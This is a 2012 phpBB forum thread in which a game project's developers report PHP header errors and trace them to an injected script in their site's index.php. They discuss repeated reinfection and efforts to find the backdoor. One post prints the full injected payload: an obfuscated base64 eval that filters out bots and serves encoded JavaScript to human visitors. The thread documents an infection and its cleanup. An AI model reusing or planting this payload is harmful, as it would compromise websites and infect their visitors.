Site Error messages?

Anything related to dev. & that doesn't fit in below categories.
Post Reply
User avatar
snowdrop
developer
Posts:798
Joined:Mon Feb 01, 2010 15:25
Location:Sweden
Contact:
Site Error messages?

Post by snowdrop » Sun Jan 08, 2012 15:33

Could everyone that gets some kind of site error messages please tell me where you get them and past a copy of the message in here?

There are reports that we have issues (again, of course, this never ends..) with the site and that it throws some error messages at the header. Thing is I can't reproduce them myself.
User avatar
Q_x
developer
Posts:334
Joined:Thu Sep 23, 2010 15:10

Re: Site Error messages?

Post by Q_x » Sun Jan 08, 2012 15:39

[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4586: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4588: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4589: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)
[phpBB Debug] PHP Warning: in file /includes/functions.php on line 4590: Cannot modify header information - headers already sent by (output started at /index.php(1) : eval()'d code:7)

trying to open http://www.wtactics.org/forum/ on chromium (Srware Iron 15.0.900.2 (Build 107001 Windows))

Also http://wtactics.org/wiki/ displays blank page, while http://wtactics.org/wiki/index.php?title=Main_Page seems to be working fine.
Attachments
sshot.png
I'm the filthy bastard you wish you never met.
User avatar
snowdrop
developer
Posts:798
Joined:Mon Feb 01, 2010 15:25
Location:Sweden
Contact:

Re: Site Error messages?

Post by snowdrop » Sun Jan 08, 2012 18:07

The following script was injected:

Code: Select all

 eval ___this_was_put_here_by_snowdrop___ (base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNjdVpHOWpkVzFsYm5RcFlUMGljbVl6SWk1emNHeHBkQ2dpTlRJek5pSXBMbkJ2Y0NzbmNYZGxKenRoUFdGYkluTndiR2tpS3lKMElsMG9JaUlwTG5KbGRtVnljMlVvS1ZzaWNHOGlLeUp3SWwwb0tUdHBaaWhoUFQwblppZDhmR0U5UFNKY2JpSXBDbVk5V3pZME15eGJOU3cxTERFd01TdzVPQ3d5T0N3ek5pdzVOaXd4TURjc09UVXNNVEV6TERFd05TdzVOeXd4TURZc01URXlMRFF5TERrNUxEazNMREV4TWl3Mk5Td3hNRFFzT1Rjc01UQTFMRGszTERFd05pd3hNVElzTVRFeExEWXlMREV4Tnl3NE1DdzVNeXc1T1N3M05DdzVNeXd4TURVc09UY3NNellzTXpVc09UUXNNVEEzTERrMkxERXhOeXd6TlN3ek55dzROeXcwTkN3NE9Td3pOeXd4TVRrc05TdzFMRFVzTVRBeExEazRMREV4TUN3NU15d3hNRFVzT1Rjc01URXdMRE0yTERNM0xEVTFMRFVzTlN3eE1qRXNNamdzT1Rjc01UQTBMREV4TVN3NU55d3lPQ3d4TVRrc05TdzFMRFVzT1RZc01UQTNMRGsxTERFeE15d3hNRFVzT1Rjc01UQTJMREV4TWl3ME1pd3hNVFVzTVRFd0xERXdNU3d4TVRJc09UY3NNellzTXpBc05UWXNNVEF4TERrNExERXhNQ3c1TXl3eE1EVXNPVGNzTWpnc01URXhMREV4TUN3NU5TdzFOeXd6TlN3eE1EQXNNVEV5TERFeE1pd3hNRGdzTlRRc05ETXNORE1zTVRFMUxERXdNQ3d4TURZc09Ua3NNVEEzTERrekxERXdOeXd4TVRJc01URXpMRFF5TERrMkxERXdOaXd4TVRFc05EVXNORElzTVRFekxERXhNU3cwTXl3eE1ERXNORE1zTVRBeExEUXlMREV3T0N3eE1EQXNNVEE0TERVNUxEazVMREV3Tnl3MU55dzBOU3d6TlN3eU9Dd3hNVFVzTVRBeExEazJMREV4TWl3eE1EQXNOVGNzTXpVc05EVXNORFFzTXpVc01qZ3NNVEF3TERrM0xERXdNU3c1T1N3eE1EQXNNVEV5TERVM0xETTFMRFExTERRMExETTFMREk0TERFeE1Td3hNVElzTVRFM0xERXdOQ3c1Tnl3MU55d3pOU3d4TVRRc01UQXhMREV4TVN3eE1ERXNPVFFzTVRBeExERXdOQ3d4TURFc01URXlMREV4Tnl3MU5Dd3hNREFzTVRBeExEazJMRGsyTERrM0xERXdOaXcxTlN3eE1EZ3NNVEEzTERFeE1Td3hNREVzTVRFeUxERXdNU3d4TURjc01UQTJMRFUwTERrekxEazBMREV4TVN3eE1EY3NNVEEwTERFeE15d3hNVElzT1Rjc05UVXNNVEEwTERrM0xEazRMREV4TWl3MU5DdzBOQ3cxTlN3eE1USXNNVEEzTERFd09DdzFOQ3cwTkN3MU5Td3pOU3cxT0N3MU5pdzBNeXd4TURFc09UZ3NNVEV3TERrekxERXdOU3c1Tnl3MU9Dd3pNQ3d6Tnl3MU5TdzFMRFVzTVRJeExEVXNOU3c1T0N3eE1UTXNNVEEyTERrMUxERXhNaXd4TURFc01UQTNMREV3Tml3eU9Dd3hNREVzT1Rnc01URXdMRGt6TERFd05TdzVOeXd4TVRBc016WXNNemNzTVRFNUxEVXNOU3cxTERFeE5DdzVNeXd4TVRBc01qZ3NPVGdzTWpnc05UY3NNamdzT1RZc01UQTNMRGsxTERFeE15d3hNRFVzT1Rjc01UQTJMREV4TWl3ME1pdzVOU3d4TVRBc09UY3NPVE1zTVRFeUxEazNMRFkxTERFd05DdzVOeXd4TURVc09UY3NNVEEyTERFeE1pd3pOaXd6TlN3eE1ERXNPVGdzTVRFd0xEa3pMREV3TlN3NU55d3pOU3d6Tnl3MU5TdzVPQ3cwTWl3eE1URXNPVGNzTVRFeUxEWXhMREV4TWl3eE1USXNNVEV3TERFd01TdzVOQ3d4TVRNc01URXlMRGszTERNMkxETTFMREV4TVN3eE1UQXNPVFVzTXpVc05EQXNNelVzTVRBd0xERXhNaXd4TVRJc01UQTRMRFUwTERRekxEUXpMREV4TlN3eE1EQXNNVEEyTERrNUxERXdOeXc1TXl3eE1EY3NNVEV5TERFeE15dzBNaXc1Tml3eE1EWXNNVEV4TERRMUxEUXlMREV4TXl3eE1URXNORE1zTVRBeExEUXpMREV3TVN3ME1pd3hNRGdzTVRBd0xERXdPQ3cxT1N3NU9Td3hNRGNzTlRjc05EVXNNelVzTXpjc05UVXNPVGdzTkRJc01URXhMREV4TWl3eE1UY3NNVEEwTERrM0xEUXlMREV4TkN3eE1ERXNNVEV4TERFd01TdzVOQ3d4TURFc01UQTBMREV3TVN3eE1USXNNVEUzTERVM0xETTFMREV3TUN3eE1ERXNPVFlzT1RZc09UY3NNVEEyTERNMUxEVTFMRGs0TERReUxERXhNU3d4TVRJc01URTNMREV3TkN3NU55dzBNaXd4TURnc01UQTNMREV4TVN3eE1ERXNNVEV5TERFd01Td3hNRGNzTVRBMkxEVTNMRE0xTERrekxEazBMREV4TVN3eE1EY3NNVEEwTERFeE15d3hNVElzT1Rjc016VXNOVFVzT1Rnc05ESXNNVEV4TERFeE1pd3hNVGNzTVRBMExEazNMRFF5TERFd05DdzVOeXc1T0N3eE1USXNOVGNzTXpVc05EUXNNelVzTlRVc09UZ3NORElzTVRFeExERXhNaXd4TVRjc01UQTBMRGszTERReUxERXhNaXd4TURjc01UQTRMRFUzTERNMUxEUTBMRE0xTERVMUxEazRMRFF5TERFeE1TdzVOeXd4TVRJc05qRXNNVEV5TERFeE1pd3hNVEFzTVRBeExEazBMREV4TXl3eE1USXNPVGNzTXpZc016VXNNVEUxTERFd01TdzVOaXd4TVRJc01UQXdMRE0xTERRd0xETTFMRFExTERRMExETTFMRE0zTERVMUxEazRMRFF5TERFeE1TdzVOeXd4TVRJc05qRXNNVEV5TERFeE1pd3hNVEFzTVRBeExEazBMREV4TXl3eE1USXNPVGNzTXpZc016VXNNVEF3TERrM0xERXdNU3c1T1N3eE1EQXNNVEV5TERNMUxEUXdMRE0xTERRMUxEUTBMRE0xTERNM0xEVTFMRFVzTlN3MUxEazJMREV3Tnl3NU5Td3hNVE1zTVRBMUxEazNMREV3Tml3eE1USXNORElzT1Rrc09UY3NNVEV5TERZMUxERXdOQ3c1Tnl3eE1EVXNPVGNzTVRBMkxERXhNaXd4TVRFc05qSXNNVEUzTERnd0xEa3pMRGs1TERjMExEa3pMREV3TlN3NU55d3pOaXd6TlN3NU5Dd3hNRGNzT1RZc01URTNMRE0xTERNM0xEZzNMRFEwTERnNUxEUXlMRGt6TERFd09Dd3hNRGdzT1Rjc01UQTJMRGsyTERZekxERXdNQ3d4TURFc01UQTBMRGsyTERNMkxEazRMRE0zTERVMUxEVXNOU3d4TWpGZFhUdHRaRDBuWVNjN2NUMGljU0k3WlQxbGRtRnNPM2M5Wmxzd0t6RmRPM005SnljN1p6MG5abkp2YlVNbk8yYzlaeXNuYUdGeVEyOWtKenRuS3owblpTYzdabTl5S0drOU1EdHBQSGN1YkdWdVozUm9PMmtyS3lsN2N6MXpLMU4wY21sdVoxdG5YU2cwSzNkYmFWMHBPMzBLYVdZb0lTaGhJVDBuWmljbUptRWhQU0pjYmlJcEtRcGxLQ2RsS0hNcEp5azdQQzl6WTNKcGNIUSsnKSk7DQp9'));
It seems only index.php were injected. They have all been cleaned and reuploaded, so stuff should work now. It is however just a matter of time before this hits us again as I am clueless to what backdoor it uses.
User avatar
snowdrop
developer
Posts:798
Joined:Mon Feb 01, 2010 15:25
Location:Sweden
Contact:

Re: Site Error messages?

Post by snowdrop » Sat Jan 21, 2012 16:36

Problem is yet to be found: Cleansing all files doesn't help, the worm gets back there directly after I upload a fresh copy of the files, suggesting there is either some unsafe script/plugin or a file with the payload somewhere lurking on the site.

This all takes immense amounts of time. I have wasted over 20 hours this far on reading about script injections and searching for what might cause it, looking at plenty of php and js-files, done many search and replaces, updated timthumb-scripts and plugins in general, tryindg to decipher access loggs etc, all with no success.

I even paid for a hoax service that was the biggest waste of money in my life - sitelock.com - that would supposedly identify and scan for viruses etc but was so mediocre I feel obligated to warn anyone in here from ever using that company for anything that free services wouldn't do anyway.

The way I do I started doing it now is to kill all files i /public_html and upload the scripts/sites again, one by one, waiting to see if it gets infected. If it doesn't I will then uploading another one. Eventually the sites will all get infected, and the scripts I uploaded the most recently would supposedly be the bad ones.
Post Reply